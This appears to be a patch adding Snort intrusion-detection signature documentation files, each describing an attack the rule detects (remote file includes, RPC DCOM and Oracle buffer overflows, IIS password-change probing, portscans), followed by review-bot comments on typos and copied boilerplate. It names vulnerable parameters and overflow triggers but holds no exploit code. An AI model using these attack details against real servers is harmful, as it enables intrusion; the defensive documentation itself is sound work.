+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpbb_root_path" parameter in the "admin_db_utilities.php" script used by the "phpNuke" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpNuke
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
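Review bot: The third Detailed Information paragraph ("This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server...") and the Attack Scenarios text about supplying credentials to "an authentication mechanism" are generic CGI boilerplate that do not describe a remote file include via "phpbb_root_path"; drop the paragraph and reword Attack Scenarios as the attacker passing a URL to a remote file as the parameter value. Also fix "ona" to "on a", and "an exploitation attempt has been attempted" in Summary is redundant.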
--- /dev/null
+++ b/doc/signatures/1005.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1005
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft Internet Information
+Server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft Internet Information Server (IIS). Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft IIS
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3189.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3189
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
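Review bot: Attack Scenarios ("a request for a file with an overly long filename via a network share") does not match Detailed Information, which says the condition is triggered by "A malformed request to an RPC port"; make the scenario consistent with the RPC DCOM description in the Summary. Typo in Ease of Attack: "Expoit" should read "Exploit". Additional References is empty for a vendor-patched issue; add the vendor bulletin and CVE entry.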
--- /dev/null
+++ b/doc/signatures/1182.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1182
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2773.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2773
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_priority_nchar
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
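Review bot: Detailed Information breaks mid-sentence: "vulnerability in the procedure drop_priority_nchar" is followed by a line starting ". This procedure is included in"; join the lines so the period follows the procedure name. Also "Oracle Oracle9i" under Affected Systems duplicates the vendor name, several "-- " separators and headers carry trailing whitespace, "Apply the appropriate vendor supplied patch" is missing its period, and Additional References is empty for a "known vulnerability".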
--- /dev/null
+++ b/doc/signatures/858.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+858
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
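Review bot: Typo in Detailed Information: "running ona web server" should read "on a web server". The line "relationships between the victim server and other hosts can be exploited by the attacker." exceeds the wrap width used by the rest of the file; rewrap it. Additional References is empty for a rule whose Ease of Attack says "Exploits exist"; add at least one reference.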
--- /dev/null
+++ b/doc/signatures/3294.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3294
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
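Review bot: This file is word-for-word 3189.txt with only the Sid changed and carries the same defects: "Expoit" in Ease of Attack, and an Attack Scenarios section ("overly long filename via a network share") inconsistent with the "malformed request to an RPC port" in Detailed Information. If the two SIDs cover different RPC DCOM conditions, Detailed Information should say how; otherwise fix both copies together.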
--- /dev/null
+++ b/doc/signatures/1154.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1154
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
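Review bot: This file duplicates 1182.txt exactly apart from the Sid. If 1154 and 1182 match different web server vulnerabilities, Summary or Detailed Information should say which, because a reader of these docs cannot tell the two events apart; otherwise note in Detailed Information that the rules form a family.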
--- /dev/null
+++ b/doc/signatures/996.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+996
+
+
+--
+Summary:
+This event is generated when an attempt is made to request an HTTP-based password change.
+
+--
+Impact:
+Information gathering/remote access.  Error messages from failed password changes can indicate whether a given account exists on the server.  Successful password changes can allow remote access to the server. 
+
+--
+Detailed Information:
+Microsoft Internet Information Services (IIS) Version 4 supplies a feature to allow users to make remote password changes.  The iisadmpwd directory has several .HTR files that are used to implement the password changes.  An attacker can request a change and use a returned form to supply an account name, existing password, and new password either to brute force changes or discover whether a specific account name exist. 
+
+--
+Affected Systems:
+
+Microsoft IIS 4.0
+
+--
+Attack Scenarios:
+An attacker can request password changes to discover existing accounts or brute force password changes.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Remove the IISADMPWD virtual directory to disable remote password changes.
+
+Consider running the IIS Lockdown Tool to disable HTR functionality.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0407
+
+Bugtraq
+http://www.securityfocus.com/bid/2110
+
+--
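Review bot: Grammar in Detailed Information: "discover whether a specific account name exist" should read "exists". Formatting: there is a double blank line after the Sid value, and a blank line between "Affected Systems:" and "Microsoft IIS 4.0" that the other files do not have. The CVE and Bugtraq entries under Additional References are the pattern the rest of the set should follow.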
--- /dev/null
+++ b/doc/signatures/122-20.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-20
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically a udp
+distributed portscan was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
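Review bot: Typos: "reconnaisance" in Impact should read "reconnaissance", and "consititute" in Detailed Information should read "constitute". Impact also reads "a targeted attack against the targeted systems" and Corrective Action "Apply any appropriate vendor supplied patches as appropriate"; drop the repeated word in each. In False Positives, "the pre-processor should be tuned" would be more useful if it named the specific sfPortscan ignore options from README.sfportscan that exclude the audit hosts.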
--- /dev/null
+++ b/doc/signatures/1938.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+1938
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow condition in the Post Office Protocol (POP) command XTND.
+
+--
+Impact:
+Possible remote execution of arbitrary code leading to a remote root 
+compromise.
+
+--
+Detailed Information:
+A vulnerability exists such that an attacker may overflow a buffer by 
+sending a large number of non-line feed characters before a line feed
+to a POP server via the XTND command.
+
+--
+Attack Scenarios:
+Simple. An attacker can supply many consecutive non-newline characters to
+the XTND function on a POP server to cause the overflow condition. 
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+RFC 1082:
+http://www.faqs.org/rfcs/rfc1082.html
+
+--
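Review bot: Attack Scenarios opens with "Simple.", which is the Ease of Attack wording; remove it. The file has no Affected Systems section; add the affected POP server implementations (or "All systems running a vulnerable POP server"). RFC 1082 is the right reference for the XTND extension, but Additional References should also carry the CVE or Bugtraq entry for the overflow itself.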
--- /dev/null
+++ b/doc/signatures/2552.txt
@@ -0,0 +1,71 @@
+Rule: 
+
+--
+Sid: 
+2552
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Oracle Application Server Web Cache.
+
+-- 
+
+Impact: 
+Serious. Possible execution of arbitrary code leading to remote
+administrative access.
+
+--
+Detailed Information:
+The Oracle Application Server Web Cache is vulnerable to a buffer
+overrun caused by poor checking of the length of an HTTP Header. If a
+large invalid HTTP Request Method is supplied to a vulnerable system, an
+attacker may be presented with the opportunity to overrun a fixed length
+buffer and subsequently execute code of their choosing on the server.
+
+--
+Affected Systems:
+Oracle Application Server Web Cache 10g 9.0.4 .0
+Oracle Oracle9i Application Server Web Cache 2.0 .0.4
+Oracle Oracle9i Application Server Web Cache 9.0.2 .3
+Oracle Oracle9i Application Server Web Cache 9.0.2 .2
+Oracle Oracle9i Application Server Web Cache 9.0.3 .1
+
+--
+
+Attack Scenarios: 
+An attacker might supply an HTTP Request Method of more than 432 bytes,
+causing the overflow to occur.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives:
+None Known
+
+--
+False Negatives:
+This rule examines Oracle Web Cache server on port 7777 or 7778.  It is possible
+to configure the Oracle Web Cache server to run on different ports.  The rule
+should be configured to reflect the appropriate ports of Oracle Web Cache
+servers on your network.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
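Review bot: The version strings under Affected Systems are broken by stray spaces ("10g 9.0.4 .0", "2.0 .0.4", "9.0.2 .3"); remove the spaces so each reads as one version number. The False Negatives note about ports 7777 and 7778 is the right kind of detail and should be repeated in other port-dependent entries such as 2007.txt. Minor: blank lines after the "-- " separators are inconsistent with the rest of the set and "Apply the appropriate vendor supplied patch" lacks a period.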
--- /dev/null
+++ b/doc/signatures/3405.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3405
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
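Review bot: Third identical copy of 3189.txt (see also 3294.txt) with only the Sid changed; the same fixes apply: "Expoit" in Ease of Attack, Attack Scenarios inconsistent with the RPC-based Detailed Information, and an empty Additional References. Add a sentence to Detailed Information telling the three SIDs apart.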
--- /dev/null
+++ b/doc/signatures/2886.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2886
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure define_site_priority
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
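Review bot: Same mid-sentence line break as 2773.txt: "vulnerability in the procedure define_site_priority" is followed by a line beginning ". This procedure is included in"; join them. "Oracle Oracle9i" duplicates the vendor name, separator lines carry trailing whitespace, "Apply the appropriate vendor supplied patch" lacks a period, and Additional References is empty for a vendor-patched issue.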
--- /dev/null
+++ b/doc/signatures/929.txt
@@ -0,0 +1,62 @@
+SID:
+929
+--
+
+Rule:
+--
+
+Summary:
+This even indicates an attempt to exploit undocumented CFML tags on a 
+Allaire ColdFusion Server
+--
+
+Impact:
+Extensive server data retrieval including settings and passwords
+--
+
+Detailed Information:
+Undocumented CFML tags allow reading and decryption of sensitive data 
+contained on servers running Allaire ColdFusion Server 2.0 - 4.0.1. This
+data can be accesses by constructing a hosted application that accesses 
+these undocumented tags with the possibility of changing values on the 
+server and reading admin and studio passwords
+--
+
+Affected Systems:
+	Allaire ColdFusion Server 2.0 - 4.0.1
+--
+
+Attack Scenarios:
+A user with permission to create pages on the server installs an 
+application that accesses the undocumented CFML tags, accessing this 
+application would allow viewing and possible modifications of these 
+settings
+--
+
+Ease of Attack:
+Medium, Attackers need the ability to add files to the server. No "In 
+the Wild" exploits were available at type of writing
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Patches are available from Allaire, install them.
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
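Review bot: This file departs from the template: SID appears before Rule, the final section is headed "References:" instead of "Additional References:", and separators follow the text without the blank line. Typos: "This even indicates" should read "event", "on a Allaire" should read "an Allaire", "can be accesses" should read "accessed", and "at type of writing" should read "at time of writing"; several sentences also lack terminal periods.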
--- /dev/null
+++ b/doc/signatures/2357.txt
@@ -0,0 +1,61 @@
+Rule:  
+
+--
+Sid:
+2357
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the PHP web application WebChat.
+
+--
+Impact:
+Execution of arbitrary code on the affected system
+
+--
+Detailed Information:
+WebChat contains a flaw such that it may be possible for an attacker
+to include code of their choosing by manipulating the variable
+WEBCHATPATH when making a GET or POST  request  to a vulnerable system.
+
+It may be possible for an attacker to execute that code with the
+privileges of the user running the webserver, usually root by supplying
+their code in the file english.php.
+
+--
+Affected Systems:
+	Webdev Webchat 0.77
+
+--
+Attack Scenarios:
+An attacker can make a request to an affected script and define their
+own path for the WEBCHATPATH variable.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
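Review bot: Detailed Information asserts the code runs "with the privileges of the user running the webserver, usually root", a strong claim with nothing in the (empty) Additional References to support it; soften it to "the user running the webserver" or add a reference. Also the double spaces in "GET or POST  request  to" should be single, and the Corrective Action lines lack periods.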
--- /dev/null
+++ b/doc/signatures/100000330.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000330
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Invision Power Board" application running on a webserver. Access to the file "moderate.php" using a remote file being passed as the "df" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "df" parameter in the "moderate.php" script used by the "Invision Power Board" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Invision Power Board
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
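Review bot: the third Detailed Information paragraph and the Attack Scenarios section are generic CGI-authentication boilerplate (`+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. ...`) that does not describe the remote file include the Summary documents; the scenario for this sid is a URL supplied in the `df` parameter of `moderate.php`, so the text should say that and the credential paragraph should be dropped. Also `running ona web server` is missing a space, and the file opens with two blank lines before `+Rule:` unlike the other files in this patch.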
--- /dev/null
+++ b/doc/signatures/1038.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1038
+
+--
+Summary:
+This event is generated when an attempt is made to access the Microsoft Site Server site configuration file. 
+
+--
+Impact:
+Intelligence gathering.  This attack may permit the viewing of the site configuration file, which may contain sensitive information such as the username and password used by the Ad Server to access SQL databases. 
+
+--
+Detailed Information:
+Microsoft Site Server Commerce Edition 3.0 contains an AdSamples directory, which is provided for instruction and demonstration of the Ad Server capabilities.  Unless directory permissions are altered, an attacker may view the site configuration file, site.csc.  This contains sensitive information such as username and password that may be used to gain unauthorized access to SQL databases.
+
+--
+Affected Systems:
+Microsoft Site Server Commerce Edition 3.0
+
+--
+Attack Scenarios:
+An attacker can craft a URL to reference the site.csc file to view sensitive information. 
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Delete the directory containing the sample code if it is not required.
+
+Restrict access to the sample code directory. 
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-1520
+
+Bugtraq
+http://www.securityfocus.com/bid/256
+
+
+--
